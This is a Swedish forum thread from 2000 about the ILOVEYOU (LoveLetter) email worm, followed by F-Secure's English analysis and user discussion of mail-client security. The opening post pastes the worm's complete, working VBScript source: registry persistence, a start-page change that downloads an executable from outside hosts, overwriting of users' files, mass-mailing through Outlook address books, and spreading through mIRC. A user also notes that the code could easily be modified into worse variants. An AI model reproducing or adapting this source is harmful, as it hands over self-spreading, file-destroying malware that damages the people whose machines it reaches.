Jag fick tidigare i morse ett email från företaget Pricerunner och öppnade det gladeligen eftersom jag kände igen sändaren, då började min hårddisk arbeta lite granna och helt plötsligt var hela vårt företag förberett för att sprida viruset vidare.
Det går till så att den döljer och gör system filer av alla filer med ändelsen bl.a .mp3 och .mp3 men det är fler ändelser den gör om.
Efter det skapar den en kompia av den filen med ändelsen: .vbs
scriptet ser ut på följande sätt:
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
Det ser ut som om den skriver ett email till alla mina kontakter i adress boken, med bifogat virus, samt att den gör om filerna och pillar i registret.
Bland annat ändrar den startsidan så att man skall ladda ner en fil från en sida, vilket jag har sett till att detta inte har skett, men var aktsamma!
Om någon hittar ett antivirus program som dödar detta vore jag tacksam om ni kunde meddela mig.
Tack!
P.S
Hela våran server samt några klienter fick viruset på några sekunder!
Dock inte alla klienter!
D.S
BS/LoveLetter is a VBScript worm. It spreads thru email
as a chain letter.
The worm uses the Outlook e-mail application to spread. LoveLetter is also a overwriting
VBS virus, and it spreads itself using mIRC client as well.
When it is executed, it first copies itself to Windows System directory as:
\- MSKernel32.vbs
\- LOVE-LETTER-FOR-YOU.TXT.vbs
and to Windows directory:
\- Win32DLL.vbs
Then it adds itself to registry, so it will be executed when the system is restarted. The
registry keys that it adds are:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Win32DLL
Next the worm replaces the Internet Explorer home page with a link that points to an
executable program, "WIN-BUGSFIX.exe". If the file is downloaded, the worm adds this
to registry as well; causing that the program will be executed when the system is
restarted.
After that, the worm creates a HTML file, "LOVE-LETTER-FOR-YOU.HTM", to the
Windows System directory. This file contains the worm, and it will be sent using mIRC
whenever the user joins an IRC channel.
Then the worm will use Outlook to mass mail itself to everyone in each address book.
The message that it sends will be as follows:
Subject: ILOVEYOU
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
LoveLetter sends the mail once to each recipient. After a mail has been sent, it adds a
marker to the registry and does not mass mail itself any more.
The virus then searches for certain filetypes on all folders on all local and remote drives
and overwrites them with its own code. The files that are overwritten have one of these
extensions: ".vbs", ".vbe", ".js", ".jse", ".css", ".wsh", ".sct", ".hta"
The virus also tries to use companion techniques, adding a secondary file next to
existing file - hoping that the user will click on the wrong file.
This is done so that the virus locates files with jpg, jpeg, mp3 and mp2 and adds a new
file next to it. For example, a picture named "pic.jpg" will cause a new file called
"pic.jpg.vbs" to be created.
LoveLetter was found globally in-the-wild on May 4th, 2000. It looks like the virus is
Philippine origin. At the beginning of the code, the virus contains the following text:
rem barok -loveletter(vbe) \<i hate go to school\>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
\[Analysis: Katrin Tocheva, Mikko Hypponen and Sami Rautiainen, F-Secure\]
Vad är speciellt med eudora och mailvirus...Fick 7 st till jobbet, men med tanke på rubriken I love you så öppnade jag ej ....*ler* Nä tack och lov hade jag blivit varnad innan
Jo kanske det. Tur att man själv har sluppit sådana här farligheter. De som programerar dessa virus skulle ju dränkas. Hade de hållt på med nått vettigt så kunde de ju gjort någon nytta. För de är ju ändå väldigt duktiga programerare.
Sant. Men problemet bottnar ju i att vissa programtillverkare (inga namn) inför funktioner i sina program som bäddar för virus av den här typen. Det var ju inte första gången just den här programtillverkaren drabbades av maskar och annat otyg. Och det lär inte vara sista heller (frågan är inte om, utan snarare när).
När skall folk börja ställa krav på sina programtillverkare? Eller börja använda produkter från tillverkare som bryr sig om sina kunders säkerhet? Just detta programföretag har varnats ett antal gånger (av personer kunniga inom områden som datasäkerhet och virusbekämpning) för att sådana här incidenter kommer att inträffa. Men har de brytt sig om varningarna?
Nu är jag inget proffs men är det inte så att dessa virus använder sig av de inbyggda macrospråken i programmen(eller nått sånt )Dessa macrospråk är ju till för att det skall kunna bli mer anvädarvänliga program så om man skulle stänga av dessa funktioner så skulle väl inte programen bli lika användarvänliga.
Så det är väl egentligen en fråga om hur mycket man vågar riskera för att få de lilla extra finesserna.
Ps Ni få rätta mig om jag har fel om detta, jag är som sagt inget proffs
Det skulle antagligen funka från en hemsida. Man behöver inte köa med outlook för att få det. Eftersom man kör med .vbs-filer, så räcker det att du har "windows scripting host" installerad. Stora delar av viruset spreds dessutom via mirc. Troligen skulle det funka om man öppnar det från eudora också (fast det kanske inte stödjer attachments ;-)
/martin - som har sett det men inte drabbats - personligen.
hmmm.. den där koden kan man ju lätt modifiera så att den gör betydligt värre saker.. det dröjer nog inte lång tid alls innan vi får se betydligt värre varianter... inte länge alls...
förresten.. jag fick inget.. betyder det att ingen har mig i sin adresslista? buää.. ingen tycker om mig.. haha
Ta tex, om du jobbar på SKF och en av dina jobbar kompisar har fått virust då slingrar den fram till din dator och tar bort *.hta *.css *.js osv.
Sen döper den om dina *.mp3 samt *.jpg och döljer dem och gör kopior, så när du startar vad du tror är din jpg fil så starar du viruset istället, boof!
Dessa macrospråk är ju till för att det skall kunna bli mer anvädarvänliga program så om man skulle stänga av dessa funktioner så skulle väl inte programen bli lika användarvänliga.
Hur många har egentligen behov av mailprogram som kan köra VBScript? Har du haft nytta av den funktionen på sista tiden? Någon annan? Kan någon ö.h.t. förklara för mig varför man inte klarar sig utan VBScript i sitt mailprogram?
Själv kör jag ett mailprogram som inte klarar vare sig script eller HTML (däremot kan jag öppna en "pipa" mot valfritt program i de fall jag behöver det - sker dock alltid på mitt initiativ). Saknar definitivt inte dessa funktioner.
de har nu skickat ut ett ett nytt virus, samma funktion, men under namnet "fwd: Joke"
tv:e sade att de hade spårat med hjälp av anvancerad teknik till en hacker som heter spyder på fillipinerna...det var nog svårt..not!!!!..han har ju signerat viruset med sitt namn och hemort!!!!
Puh... då var man tillbaks efter ett par hektiska dagar.
Klart irriterande. Första varningen fick jag via e-post (är det inte typiskt) av en engelsk kollega c:a 1,5 timme innan det bröt ut på allvar i Sverige. Synd att jag inte var uppkopplad...
Alla e-postprogram som accepterar att man kör filer direkt från e-postprogramet kan påverkas. Dock är Microsofts produkter hårdare drabbade eftersom det är för dessa "viruset" är skrivet.
Qaz, Robban m.fl.
Jag tycker faktiskt kritiken mot MS i detta fall är lite oförtjänt.
Låt mig göra en jämförelse, ska vi ta bort alla plank för att folk inte ska kunna klottra på dem?
Det finns lösningar som skulle kunna stoppa denna typ av virus vid till exempel företagens primära e-postingångar (Hur tusan översätter man mailgate!?). Lösningar för detta har funnits i åratal! Men! Trots det lyssnar inte företagen när lösningarna blir presenterade.
Varför ska funktionen vb-skript finnas i ett e-postprogram.
Det enda jag kan kommentera detta med är att inom området att utnyttja applikationers och systems funktioner ligger jänkarna långt före oss. Jag är övertygad om att vb-skript uttnytjas frekvent "over there".
mvR
Orsak till redigering:
Upptäckte några syftnings- och svenskafel...
Låt mig göra en jämförelse, ska vi ta bort alla plank för att folk inte ska kunna klottra på dem?
Nä, men vi kanske skall låta bli att ställa upp ett stånd med gratis sprayfärg framför planket.
Här är det ju frågan om en funktion i Outlook som de flesta ö.h.t. inte använder sig av. Varför ändå lämna den funktionen aktiv i stället för att ha den avstängd som standard och låta dem som har användning av funktionerna öppna upp det de behöver?
264 ms totalt · 4 externa anrop · v20260731065814-full.d34c6d5a